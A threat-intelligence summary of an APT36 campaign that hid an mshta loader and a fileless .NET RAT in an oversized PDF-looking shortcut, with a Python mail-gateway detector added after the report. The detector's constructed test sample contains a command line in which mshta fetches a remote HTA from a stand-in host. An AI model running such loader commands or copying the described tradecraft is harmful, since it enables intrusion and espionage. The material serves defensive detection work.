In a technical analysis, CYFIRMA researchers reported a targeted malware campaign attributed to APT36 that used an oversized .lnk shortcut embedding a full PDF to target Indian government entities, first observed on 2025-12-15 and communicating with C2 IP 2.56.10.86 on TCP port 8621.
KEY FACTS
- Incident: Targeted spear-phishing delivering a ZIP with a double-extension .pdf.lnk
- Threat actor: APT36 (attributed operation)
- Technique: mshta-based HTA loader and fileless .NET DLL execution
- First observed: 2025-12-15
Initial access was via a ZIP archive named “Online JLPT Exam Dec 2025.zip” that contained a .pdf.lnk shortcut crafted to include a full PDF structure to appear legitimate. The shortcut launched mshta.exe to fetch a remote HTA and to open a decoy PDF while malicious code ran in the background.
The HTA loader used obfuscation, custom Base64 and XOR decoding and environment manipulation. Two staged payload containers called ReadOnly and WriteOnly were reconstructed in memory. ReadOnly carried serialized XAML configuration that disabled .NET deserialization safeguards. WriteOnly was a fileless DLL executed in memory that acted as the core RAT.
The in-memory malware implemented extensive espionage capabilities including system profiling, file enumeration and theft of Office and database files, screenshot capture and remote desktop, clipboard theft and manipulation, remote shell execution and encrypted C2 using AES. Persistence routines were adapted based on detected antivirus products with distinct paths for Kaspersky, Quick Heal and Avast family products.
Recommended mitigations include blocking shortcut files in email, enforcing display of full file extensions, restricting execution of living-off-the-land binaries such as mshta.exe and PowerShell where not required, deploying EDR with behavioral detection of in-memory deserialization, and monitoring outbound encrypted connections to untrusted infrastructure. The scope of compromise across organizations was not quantified in the report.
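A mail-gateway or triage check for the shortcut indicators described above (double extension, oversized .lnk, embedded PDF header, mshta command line), written as an added example that is not part of the CYFIRMA report; the 64 KiB size threshold, the scoring rule and the sample archive are constructed assumptions:

```python
import io
import re
import zipfile

# LNK files start with HeaderSize 0x4C followed by the ShellLink CLSID (MS-SHLLINK).
LNK_HEADER = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
PDF_MAGIC = b"%PDF-"
SIZE_THRESHOLD = 64 * 1024  # assumed cut-off; genuine shortcuts are a few KB
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.lnk$", re.IGNORECASE)

def contains_mshta(data: bytes) -> bool:
    """Look for mshta in both ANSI and UTF-16LE (LNK string data is often Unicode)."""
    low = data.lower()
    return b"mshta" in low or "mshta".encode("utf-16-le") in low

def inspect_member(name: str, data: bytes) -> dict:
    """Evaluate one archive member against the indicators from the report."""
    return {
        "double_extension": DOUBLE_EXT.search(name) is not None,
        "is_lnk": data.startswith(LNK_HEADER),
        "oversized": len(data) > SIZE_THRESHOLD,
        "embeds_pdf": PDF_MAGIC in data,
        "invokes_mshta": contains_mshta(data),
    }

def scan_zip(zip_bytes: bytes) -> dict:
    """Map every member name in the archive to its indicator dict."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            results[info.filename] = inspect_member(info.filename, zf.read(info))
    return results

def verdict(findings: dict) -> str:
    """Assumed policy: three or more indicators block, one or two go to review."""
    hits = sum(findings.values())
    return "block" if hits >= 3 else ("review" if hits else "clean")

def build_sample_zip() -> bytes:
    """Constructed sample: a shortcut body carrying an mshta command line, an
    embedded PDF header and zero padding that pushes it past the size threshold."""
    body = (LNK_HEADER + b"\x00" * 44
            + "mshta.exe http://example.invalid/x.hta".encode("utf-16-le")
            + PDF_MAGIC + b"1.7\n" + b"\x00" * (SIZE_THRESHOLD + 100))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Online JLPT Exam Dec 2025.pdf.lnk", body)
        zf.writestr("readme.txt", b"plain text, nothing to flag")
    return buf.getvalue()
```

Real shortcut parsing should follow MS-SHLLINK to read the actual target and arguments; the byte search here is a coarse first-pass filter, not a parser.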
WHY IT MATTERS
The operation demonstrates evolved tradecraft that blends file format deception with fileless, in-memory execution to reduce forensic traces and to maintain long term access. Organizations should prioritize behavior based detection and strict controls on scriptable system utilities to reduce exposure.

